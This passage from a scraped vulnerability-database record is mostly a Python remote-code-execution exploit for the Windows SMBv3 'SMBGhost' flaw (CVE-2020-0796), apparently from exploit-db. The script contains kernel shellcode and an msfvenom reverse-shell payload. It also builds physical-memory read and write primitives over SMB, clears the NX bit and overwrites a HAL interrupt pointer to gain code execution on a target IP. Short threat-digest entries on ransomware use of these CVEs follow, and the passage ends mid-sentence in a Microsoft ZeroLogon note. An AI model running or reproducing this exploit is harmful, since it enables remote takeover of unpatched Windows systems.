b\"\\xB8\\x4C\\x89\\xE9\\xE8\\x91\\x00\\x00\\x00\\x49\\x89\\x06\\x4D\\x8B\\x4D\\x30\"\r\nKERNEL_SHELLCODE += b\"\\x4D\\x8B\\x45\\x38\\x49\\x81\\xE8\\xF8\\x02\\x00\\x00\\x48\\x31\\xF6\\x49\\x81\"\r\nKERNEL_SHELLCODE += b\"\\xE9\\xF8\\x02\\x00\\x00\\x41\\x8B\\x79\\x74\\x0F\\xBA\\xE7\\x04\\x73\\x05\\x4C\"\r\nKERNEL_SHELLCODE += b\"\\x89\\xCE\\xEB\\x0C\\x4D\\x39\\xC8\\x4D\\x8B\\x89\\xF8\\x02\\x00\\x00\\x75\\xDE\"\r\nKERNEL_SHELLCODE += b\"\\x48\\x85\\xF6\\x74\\x40\\x49\\x8D\\x4E\\x08\\x48\\x89\\xF2\\x4D\\x31\\xC0\\x4C\"\r\nKERNEL_SHELLCODE += b\"\\x8D\\x0D\\xB9\\x00\\x00\\x00\\x52\\x41\\x50\\x41\\x50\\x41\\x50\\xBF\\xC4\\x5C\"\r\nKERNEL_SHELLCODE += b\"\\x19\\x6D\\x48\\x83\\xEC\\x20\\xE8\\x2F\\x00\\x00\\x00\\x48\\x83\\xC4\\x40\\x49\"\r\nKERNEL_SHELLCODE += b\"\\x8D\\x4E\\x08\\xBF\\x34\\x46\\xCC\\xAF\\x48\\x83\\xEC\\x20\\xE8\\x19\\x00\\x00\"\r\nKERNEL_SHELLCODE += b\"\\x00\\x48\\x83\\xC4\\x20\\xFA\\x48\\x89\\xD8\\x5F\\x5E\\x5B\\x5A\\x59\\x41\\x5E\"\r\nKERNEL_SHELLCODE += b\"\\x41\\x5F\\x41\\x5D\\x41\\x59\\x41\\x58\\xFF\\xE0\\xE8\\x02\\x00\\x00\\x00\\xFF\"\r\nKERNEL_SHELLCODE += b\"\\xE0\\x53\\x51\\x56\\x41\\x8B\\x47\\x3C\\x4C\\x01\\xF8\\x8B\\x80\\x88\\x00\\x00\"\r\nKERNEL_SHELLCODE += b\"\\x00\\x4C\\x01\\xF8\\x50\\x8B\\x48\\x18\\x8B\\x58\\x20\\x4C\\x01\\xFB\\xFF\\xC9\"\r\nKERNEL_SHELLCODE += b\"\\x8B\\x34\\x8B\\x4C\\x01\\xFE\\xE8\\x1F\\x00\\x00\\x00\\x39\\xF8\\x75\\xEF\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x8B\\x58\\x24\\x4C\\x01\\xFB\\x66\\x8B\\x0C\\x4B\\x8B\\x58\\x1C\\x4C\\x01\\xFB\"\r\nKERNEL_SHELLCODE += b\"\\x8B\\x04\\x8B\\x4C\\x01\\xF8\\x5E\\x59\\x5B\\xC3\\x52\\x31\\xC0\\x99\\xAC\\xC1\"\r\nKERNEL_SHELLCODE += b\"\\xCA\\x0D\\x01\\xC2\\x85\\xC0\\x75\\xF6\\x92\\x5A\\xC3\\xE8\\xA1\\xFF\\xFF\\xFF\"\r\nKERNEL_SHELLCODE += b\"\\x80\\x78\\x02\\x80\\x77\\x05\\x0F\\xB6\\x40\\x03\\xC3\\x8B\\x40\\x03\\xC3\\x41\"\r\nKERNEL_SHELLCODE += b\"\\x57\\x41\\x56\\x57\\x56\\x48\\x8B\\x05\\x0A\\x01\\x00\\x00\\x48\\x8B\\x48\\x18\"\r\nKERNEL_SHELLCODE += b\"\\x48\\x8B\\x49\\x20\\x48\\x8B\\x09\\x66\\x83\\x79\\x48\\x18\\x75\\xF6\\x48\\x8B\"\r\nKERNEL_SHELLCODE += b\"\\x41\\x50\\x81\\x78\\x0C\\x33\\x00\\x32\\x00\\x75\\xE9\\x4C\\x8B\\x79\\x20\\xBF\"\r\nKERNEL_SHELLCODE += b\"\\x5E\\x51\\x5E\\x83\\xE8\\x58\\xFF\\xFF\\xFF\\x49\\x89\\xC6\\x4C\\x8B\\x3D\\xB3\"\r\nKERNEL_SHELLCODE += b\"\\x01\\x00\\x00\\x31\\xC0\\x44\\x0F\\x22\\xC0\\x48\\x8D\\x15\\x8E\\x01\\x00\\x00\"\r\nKERNEL_SHELLCODE += b\"\\x89\\xC1\\x48\\xF7\\xD1\\x49\\x89\\xC0\\xB0\\x40\\x50\\xC1\\xE0\\x06\\x50\\x49\"\r\nKERNEL_SHELLCODE += b\"\\x89\\x01\\x48\\x83\\xEC\\x20\\xBF\\xEA\\x99\\x6E\\x57\\xE8\\x1A\\xFF\\xFF\\xFF\"\r\nKERNEL_SHELLCODE += b\"\\x48\\x83\\xC4\\x30\\x48\\x8B\\x3D\\x63\\x01\\x00\\x00\\x48\\x8D\\x35\\x77\\x00\"\r\nKERNEL_SHELLCODE += b\"\\x00\\x00\\xB9\\x1D\\x00\\x00\\x00\\xF3\\xA4\\x48\\x8D\\x35\\x6E\\x01\\x00\\x00\"\r\nKERNEL_SHELLCODE += b\"\\xB9\\x58\\x02\\x00\\x00\\xF3\\xA4\\x48\\x8D\\x0D\\xD8\\x00\\x00\\x00\\x65\\x48\"\r\nKERNEL_SHELLCODE += b\"\\x8B\\x14\\x25\\x88\\x01\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x8D\\x0D\\x46\\x00\\x00\"\r\nKERNEL_SHELLCODE += b\"\\x00\\x41\\x50\\x6A\\x01\\x48\\x8B\\x05\\x22\\x01\\x00\\x00\\x50\\x41\\x50\\x48\"\r\nKERNEL_SHELLCODE += b\"\\x83\\xEC\\x20\\xBF\\xC4\\x5C\\x19\\x6D\\xE8\\xBD\\xFE\\xFF\\xFF\\x48\\x83\\xC4\"\r\nKERNEL_SHELLCODE += b\"\\x40\\x48\\x8D\\x0D\\x9E\\x00\\x00\\x00\\x4C\\x89\\xF2\\x4D\\x31\\xC9\\xBF\\x34\"\r\nKERNEL_SHELLCODE += b\"\\x46\\xCC\\xAF\\x48\\x83\\xEC\\x20\\xE8\\x9E\\xFE\\xFF\\xFF\\x48\\x83\\xC4\\x20\"\r\nKERNEL_SHELLCODE += b\"\\x5E\\x5F\\x41\\x5E\\x41\\x5F\\xC3\\x90\\xC3\\x48\\x92\\x31\\xC9\\x51\\x51\\x49\"\r\nKERNEL_SHELLCODE += b\"\\x89\\xC9\\x4C\\x8D\\x05\\x0D\\x00\\x00\\x00\\x89\\xCA\\x48\\x83\\xEC\\x20\\xFF\"\r\nKERNEL_SHELLCODE += b\"\\xD0\\x48\\x83\\xC4\\x30\\xC3\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\"\r\nKERNEL_SHELLCODE += b\"\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x58\\x00\\x00\"\r\nKERNEL_SHELLCODE += b\"\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n# Reverse shell generated by msfvenom. Can you believe I had to download Kali Linux for this shit?\r\n\r\nUSER_PAYLOAD = b\"\"\r\nUSER_PAYLOAD += b\"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc0\\x00\\x00\\x00\\x41\\x51\\x41\"\r\nUSER_PAYLOAD += b\"\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\"\r\nUSER_PAYLOAD += b\"\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\"\r\nUSER_PAYLOAD += b\"\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\"\r\nUSER_PAYLOAD += b\"\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\"\r\nUSER_PAYLOAD += b\"\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\"\r\nUSER_PAYLOAD += b\"\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\"\r\nUSER_PAYLOAD += b\"\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\"\r\nUSER_PAYLOAD += b\"\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\"\r\nUSER_PAYLOAD += b\"\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\"\r\nUSER_PAYLOAD += b\"\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\"\r\nUSER_PAYLOAD += b\"\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\"\r\nUSER_PAYLOAD += b\"\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\"\r\nUSER_PAYLOAD += b\"\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\"\r\nUSER_PAYLOAD += b\"\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\"\r\nUSER_PAYLOAD += b\"\\x8b\\x12\\xe9\\x57\\xff\\xff\\xff\\x5d\\x49\\xbe\\x77\\x73\\x32\"\r\nUSER_PAYLOAD += b\"\\x5f\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xe6\\x48\\x81\\xec\"\r\nUSER_PAYLOAD += b\"\\xa0\\x01\\x00\\x00\\x49\\x89\\xe5\\x49\\xbc\\x02\\x00\\x7a\\x69\"\r\nUSER_PAYLOAD += b\"\\xc0\\xa8\\x8e\\x01\\x41\\x54\\x49\\x89\\xe4\\x4c\\x89\\xf1\\x41\"\r\nUSER_PAYLOAD += b\"\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x4c\\x89\\xea\\x68\\x01\\x01\"\r\nUSER_PAYLOAD += b\"\\x00\\x00\\x59\\x41\\xba\\x29\\x80\\x6b\\x00\\xff\\xd5\\x50\\x50\"\r\nUSER_PAYLOAD += b\"\\x4d\\x31\\xc9\\x4d\\x31\\xc0\\x48\\xff\\xc0\\x48\\x89\\xc2\\x48\"\r\nUSER_PAYLOAD += b\"\\xff\\xc0\\x48\\x89\\xc1\\x41\\xba\\xea\\x0f\\xdf\\xe0\\xff\\xd5\"\r\nUSER_PAYLOAD += b\"\\x48\\x89\\xc7\\x6a\\x10\\x41\\x58\\x4c\\x89\\xe2\\x48\\x89\\xf9\"\r\nUSER_PAYLOAD += b\"\\x41\\xba\\x99\\xa5\\x74\\x61\\xff\\xd5\\x48\\x81\\xc4\\x40\\x02\"\r\nUSER_PAYLOAD += b\"\\x00\\x00\\x49\\xb8\\x63\\x6d\\x64\\x00\\x00\\x00\\x00\\x00\\x41\"\r\nUSER_PAYLOAD += b\"\\x50\\x41\\x50\\x48\\x89\\xe2\\x57\\x57\\x57\\x4d\\x31\\xc0\\x6a\"\r\nUSER_PAYLOAD += b\"\\x0d\\x59\\x41\\x50\\xe2\\xfc\\x66\\xc7\\x44\\x24\\x54\\x01\\x01\"\r\nUSER_PAYLOAD += b\"\\x48\\x8d\\x44\\x24\\x18\\xc6\\x00\\x68\\x48\\x89\\xe6\\x56\\x50\"\r\nUSER_PAYLOAD += b\"\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xff\\xc0\\x41\\x50\\x49\\xff\"\r\nUSER_PAYLOAD += b\"\\xc8\\x4d\\x89\\xc1\\x4c\\x89\\xc1\\x41\\xba\\x79\\xcc\\x3f\\x86\"\r\nUSER_PAYLOAD += b\"\\xff\\xd5\\x48\\x31\\xd2\\x48\\xff\\xca\\x8b\\x0e\\x41\\xba\\x08\"\r\nUSER_PAYLOAD += b\"\\x87\\x1d\\x60\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x41\\xba\\xa6\"\r\nUSER_PAYLOAD += b\"\\x95\\xbd\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\"\r\nUSER_PAYLOAD += b\"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\"\r\nUSER_PAYLOAD += b\"\\x41\\x89\\xda\\xff\\xd5\"\r\n\r\n\r\nPML4_SELFREF = 0\r\nPHAL_HEAP = 0\r\nPHALP_INTERRUPT = 0\r\nPHALP_APIC_INTERRUPT = 0\r\nPNT_ENTRY = 0\r\n\r\nmax_read_retry = 3\r\noverflow_val = 0x1100\r\nwrite_unit = 0xd0\r\npmdl_va = KUSER_SHARED_DATA + 0x900\r\npmdl_mapva = KUSER_SHARED_DATA + 0x800\r\npshellcodeva = KUSER_SHARED_DATA + 0xa00\r\n\r\n\r\nclass MDL:\r\n def __init__(self, map_va, phys_addr):\r\n self.next = struct.pack(\"<Q\", 0x0)\r\n self.size = struct.pack(\"<H\", 0x40)\r\n self.mdl_flags = struct.pack(\"<H\", 0x5004)\r\n self.alloc_processor = struct.pack(\"<H\", 0x0)\r\n self.reserved = struct.pack(\"<H\", 0x0)\r\n self.process = struct.pack(\"<Q\", 0x0)\r\n self.map_va = struct.pack(\"<Q\", map_va)\r\n map_va &= ~0xFFF\r\n self.start_va = struct.pack(\"<Q\", map_va)\r\n self.byte_count = struct.pack(\"<L\", 0x1100)\r\n self.byte_offset = struct.pack(\"<L\", (phys_addr & 0xFFF) + 0x4)\r\n phys_addr_enc = (phys_addr & 0xFFFFFFFFFFFFF000) >> 12\r\n self.phys_addr1 = struct.pack(\"<Q\", phys_addr_enc)\r\n self.phys_addr2 = struct.pack(\"<Q\", phys_addr_enc)\r\n self.phys_addr3 = struct.pack(\"<Q\", phys_addr_enc)\r\n\r\n def raw_bytes(self):\r\n mdl_bytes = self.next + self.size + self.mdl_flags + \\\r\n self.alloc_processor + self.reserved + self.process + \\\r\n self.map_va + self.start_va + self.byte_count + \\\r\n self.byte_offset + self.phys_addr1 + self.phys_addr2 + \\\r\n self.phys_addr3\r\n return mdl_bytes\r\n\r\n\r\ndef reconnect(ip, port):\r\n sock = socket.socket(socket.AF_INET)\r\n sock.settimeout(7)\r\n sock.connect((ip, port))\r\n return sock\r\n\r\n\r\ndef write_primitive(ip, port, data, addr):\r\n sock = reconnect(ip, port)\r\n smb_negotiate(sock)\r\n sock.recv(1000)\r\n uncompressed_data = b\"\\x41\"*(overflow_val - len(data))\r\n uncompressed_data += b\"\\x00\"*PNET_RAW_BUFF_OFFSET\r\n uncompressed_data += struct.pack('<Q', addr)\r\n compressed_data = compress(uncompressed_data)\r\n smb_compress(sock, compressed_data, 0xFFFFFFFF, data)\r\n sock.close()\r\n\r\n\r\ndef write_srvnet_buffer_hdr(ip, port, data, offset):\r\n sock = reconnect(ip, port)\r\n smb_negotiate(sock)\r\n sock.recv(1000)\r\n compressed_data = compress_evil(data)\r\n dummy_data = b\"\\x33\"*(overflow_val + offset)\r\n smb_compress(sock, compressed_data, 0xFFFFEFFF, dummy_data)\r\n sock.close()\r\n\r\n\r\ndef read_physmem_primitive(ip, port, phys_addr):\r\n i = 0\r\n while i < max_read_retry:\r\n i += 1\r\n buff = try_read_physmem_primitive(ip, port, phys_addr)\r\n if buff is not None:\r\n return buff\r\n\r\n\r\ndef try_read_physmem_primitive(ip, port, phys_addr):\r\n fake_mdl = MDL(pmdl_mapva, phys_addr).raw_bytes()\r\n write_primitive(ip, port, fake_mdl, pmdl_va)\r\n write_srvnet_buffer_hdr(ip, port, struct.pack('<Q', pmdl_va), PMDL1_OFFSET)\r\n\r\n i = 0\r\n while i < max_read_retry:\r\n i += 1\r\n sock = reconnect(ip, port)\r\n smb_negotiate(sock)\r\n buff = sock.recv(1000)\r\n sock.close()\r\n if buff[4:8] != b\"\\xfeSMB\":\r\n return buff\r\n\r\n\r\ndef get_phys_addr(ip, port, va_addr):\r\n pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1)))\r\n pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1)))\r\n pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1)))\r\n pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1)))\r\n\r\n pml4e = PML4 + pml4_index*0x8\r\n pdpt_buff = read_physmem_primitive(ip, port, pml4e)\r\n\r\n if pdpt_buff is None:\r\n sys.exit(\"[-] physical read primitive failed\")\r\n\r\n pdpt = struct.unpack(\"<Q\", pdpt_buff[0:8])[0] & 0xFFFFF000\r\n pdpte = pdpt + pdpt_index*0x8\r\n pdt_buff = read_physmem_primitive(ip, port, pdpte)\r\n\r\n if pdt_buff is None:\r\n sys.exit(\"[-] physical read primitive failed\")\r\n\r\n pdt = struct.unpack(\"<Q\", pdt_buff[0:8])[0] & 0xFFFFF000\r\n pdte = pdt + pdt_index*0x8\r\n pt_buff = read_physmem_primitive(ip, port, pdte)\r\n\r\n if pt_buff is None:\r\n sys.exit(\"[-] physical read primitive failed\")\r\n\r\n pt = struct.unpack(\"<Q\", pt_buff[0:8])[0]\r\n \r\n if pt & (1 << (8 - 1)):\r\n phys_addr = (pt & 0xFFFFF000) + (pt_index & 0xFFF)*0x1000 + (va_addr & 0xFFF)\r\n return phys_addr\r\n else:\r\n pt = pt & 0xFFFFF000\r\n\r\n pte = pt + pt_index*0x8\r\n pte_buff = read_physmem_primitive(ip, port, pte)\r\n\r\n if pte_buff is None:\r\n sys.exit(\"[-] physical read primitive failed\")\r\n\r\n phys_addr = (struct.unpack(\"<Q\", pte_buff[0:8])[0] & 0xFFFFF000) + \\\r\n (va_addr & 0xFFF)\r\n\r\n return phys_addr\r\n\r\n\r\ndef get_pte_va(addr):\r\n pt = addr >> 9\r\n lb = (0xFFFF << 48) | (PML4_SELFREF << 39)\r\n ub = ((0xFFFF << 48) | (PML4_SELFREF << 39) +\r\n 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8\r\n pt = pt | lb\r\n pt = pt & ub\r\n\r\n return pt\r\n\r\n\r\ndef overwrite_pte(ip, port, addr):\r\n phys_addr = get_phys_addr(ip, port, addr)\r\n\r\n buff = read_physmem_primitive(ip, port, phys_addr)\r\n\r\n if buff is None:\r\n sys.exit(\"[-] read primitive failed!\")\r\n\r\n pte_val = struct.unpack(\"<Q\", buff[0:8])[0]\r\n\r\n # Clear NX bit\r\n overwrite_val = pte_val & (((1 << 63) - 1))\r\n overwrite_buff = struct.pack(\"<Q\", overwrite_val)\r\n\r\n write_primitive(ip, port, overwrite_buff, addr)\r\n\r\n\r\ndef build_shellcode():\r\n global KERNEL_SHELLCODE\r\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PHALP_INTERRUPT +\r\n HALP_APIC_REQ_INTERRUPT_OFFSET)\r\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PHALP_APIC_INTERRUPT)\r\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PNT_ENTRY & 0xFFFFFFFFFFFFF000)\r\n KERNEL_SHELLCODE += USER_PAYLOAD\r\n\r\n\r\ndef search_hal_heap(ip, port):\r\n global PHALP_INTERRUPT\r\n global PHALP_APIC_INTERRUPT\r\n search_len = 0x10000\r\n\r\n index = PHAL_HEAP\r\n page_index = PHAL_HEAP\r\n cons = 0\r\n phys_addr = 0\r\n\r\n while index < PHAL_HEAP + search_len:\r\n\r\n # It seems that pages in the HAL heap are not necessarily contiguous in physical memory, \r\n # so we try to reduce number of reads like this \r\n \r\n if not (index & 0xFFF):\r\n phys_addr = get_phys_addr(ip, port, index)\r\n else:\r\n phys_addr = (phys_addr & 0xFFFFFFFFFFFFF000) + (index & 0xFFF)\r\n\r\n buff = read_physmem_primitive(ip, port, phys_addr)\r\n\r\n if buff is None:\r\n sys.exit(\"[-] physical read primitive failed!\")\r\n\r\n entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1)\r\n i = 0\r\n \r\n # This heuristic seems to be OK to find HalpInterruptController, but could use improvement\r\n while i < entry_indices:\r\n entry = struct.unpack(\"<Q\", buff[i:i+8])[0]\r\n i += 8\r\n if (entry & 0xFFFFFF0000000000) != 0xFFFFF80000000000:\r\n cons = 0\r\n continue\r\n cons += 1\r\n if cons > 3:\r\n PHALP_INTERRUPT = index + i - 0x40\r\n print(\"[+] found HalpInterruptController at %lx\"\r\n % PHALP_INTERRUPT)\r\n\r\n if len(buff) < i + 0x40:\r\n buff = read_physmem_primitive(ip, port, index + i + 0x38)\r\n PHALP_APIC_INTERRUPT = struct.unpack(\"<Q\", buff[0:8])[0]\r\n \r\n if buff is None:\r\n sys.exit(\"[-] physical read primitive failed!\")\r\n else:\r\n PHALP_APIC_INTERRUPT = struct.unpack(\"<Q\",buff[i + 0x38:i+0x40])[0]\r\n \r\n print(\"[+] found HalpApicRequestInterrupt at %lx\" % PHALP_APIC_INTERRUPT)\r\n \r\n return\r\n index += entry_indices\r\n\r\n sys.exit(\"[-] failed to find HalpInterruptController!\")\r\n\r\n\r\ndef search_selfref(ip, port):\r\n search_len = 0x1000\r\n index = PML4\r\n\r\n while search_len:\r\n buff = read_physmem_primitive(ip, port, index)\r\n if buff is None:\r\n return\r\n entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1)\r\n i = 0\r\n while i < entry_indices:\r\n entry = struct.unpack(\"<Q\",buff[i:i+8])[0] & 0xFFFFF000\r\n if entry == PML4:\r\n return index + i\r\n i += 8\r\n search_len -= entry_indices\r\n index += entry_indices\r\n\r\n\r\ndef find_pml4_selfref(ip, port):\r\n global PML4_SELFREF\r\n self_ref = search_selfref(ip, port)\r\n\r\n if self_ref is None:\r\n sys.exit(\"[-] failed to find PML4 self reference entry!\")\r\n\r\n PML4_SELFREF = (self_ref & 0xFFF) >> 3\r\n\r\n print(\"[+] found PML4 self-ref entry %0x\" % PML4_SELFREF)\r\n\r\n\r\ndef find_low_stub(ip, port):\r\n global PML4\r\n global PHAL_HEAP\r\n global PNT_ENTRY\r\n\r\n limit = 0x100000\r\n index = 0x1000\r\n\r\n while index < limit:\r\n buff = read_physmem_primitive(ip, port, index)\r\n\r\n if buff is None:\r\n sys.exit(\"[-] physical read primitive failed!\")\r\n\r\n entry = struct.unpack(\"<Q\", buff[0:8])[0] & 0xFFFFFFFFFFFF00FF\r\n\r\n if entry == LOWSTUB_JMP:\r\n print(\"[+] found low stub at phys addr %lx!\" % index)\r\n PML4 = struct.unpack(\"<Q\", buff[PML4_LOWSTUB_OFFSET: PML4_LOWSTUB_OFFSET + 8])[0]\r\n print(\"[+] PML4 at %lx\" % PML4)\r\n PHAL_HEAP = struct.unpack(\"<Q\", buff[SELFVA_LOWSTUB_OFFSET:SELFVA_LOWSTUB_OFFSET + 8])[0] & 0xFFFFFFFFF0000000\r\n print(\"[+] base of HAL heap at %lx\" % PHAL_HEAP)\r\n\r\n buff = read_physmem_primitive(ip, port, index + NTENTRY_LOWSTUB_OFFSET)\r\n\r\n if buff is None:\r\n sys.exit(\"[-] physical read primitive failed!\")\r\n\r\n PNT_ENTRY = struct.unpack(\"<Q\", buff[0:8])[0]\r\n print(\"[+] ntoskrnl entry at %lx\" % PNT_ENTRY)\r\n return\r\n\r\n index += 0x1000\r\n\r\n sys.exit(\"[-] Failed to find low stub in physical memory!\")\r\n\r\n\r\ndef do_rce(ip, port):\r\n find_low_stub(ip, port)\r\n find_pml4_selfref(ip, port)\r\n search_hal_heap(ip, port)\r\n \r\n build_shellcode()\r\n\r\n print(\"[+] built shellcode!\")\r\n\r\n pKernelUserSharedPTE = get_pte_va(KUSER_SHARED_DATA)\r\n print(\"[+] KUSER_SHARED_DATA PTE at %lx\" % pKernelUserSharedPTE)\r\n\r\n overwrite_pte(ip, port, pKernelUserSharedPTE)\r\n print(\"[+] KUSER_SHARED_DATA PTE NX bit cleared!\")\r\n \r\n # TODO: figure out why we can't write the entire shellcode data at once. There is a check before srv2!Srv2DecompressData preventing the call of the function.\r\n to_write = len(KERNEL_SHELLCODE)\r\n write_bytes = 0\r\n while write_bytes < to_write:\r\n write_sz = min([write_unit, to_write - write_bytes])\r\n write_primitive(ip, port, KERNEL_SHELLCODE[write_bytes:write_bytes + write_sz], pshellcodeva + write_bytes)\r\n write_bytes += write_sz\r\n \r\n print(\"[+] Wrote shellcode at %lx!\" % pshellcodeva)\r\n\r\n input(\"[+] Press a key to execute shellcode!\")\r\n \r\n write_primitive(ip, port, struct.pack(\"<Q\", pshellcodeva), PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET)\r\n print(\"[+] overwrote HalpInterruptController pointer, should have execution shortly...\")\r\n \r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-ip\", help=\"IP address of target\", required=True)\r\n parser.add_argument(\"-p\", \"--port\", default=445, help=\"SMB port, \\\r\n default: 445\", required=False, type=int)\r\n args = parser.parse_args()\r\n\r\n do_rce(args.ip, args.port)", "sourceHref": "https://www.exploit-db.com/download/48537", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2022-08-17T04:36:00", "description": "Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 563 14 3 69 08 71 For a detailed threat digest, download the pdf file here Summary The second week of August 2022 witnessed the discovery of 563 vulnerabilities out of which 14 gained the attention of Threat Actors and security researchers worldwide. Among these 14, 2 zero-day, and 10 vulnerabilities are awaiting analysis on the National Vulnerability Database (NVD). Hive Pro Threat Research Team has curated a list of 14 CVEs that require immediate action. This week also saw Cuba Ransomware exploiting CVE-2020-1472 and CVE-2021-1732 and another vulnerability CVE-2020-0796 was seen exploited by BlueSky Ransomware. Further, we also observed 3 Threat Actor groups being highly active in the last week. UNC2447, an unknown threat actor group popular for financial crime and gain, Lapsus$, a Brazilian threat actor group popular for Data theft and Destruction, and Yanluowang ransomware gang, a Chinese threat actor group popular for financial crime and gain were observed stealing around 2.8 GB of data from Cisco. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-16T05:00:49", "type": "hivepro", "title": "Vulnerabilities & Threats that Matter 08 \u2013 14th Aug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1472", "CVE-2021-1732"], "modified": "2022-08-16T05:00:49", "id": "HIVEPRO:B3F9F66CBDECF3B8E7AADF5951D97F6A", "href": "https://www.hivepro.com/vulnerabilities-threats-that-matter-08-14th-aug/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2020-12-02T21:36:53", "description": "There has been a huge focus on the recently patched CVE-2020-1472 Netlogon Elevation of Privilege vulnerability, widely known as ZeroLogon. While Microsoft strongly recommends that you deploy the latest security updates to your servers and devices, we also want 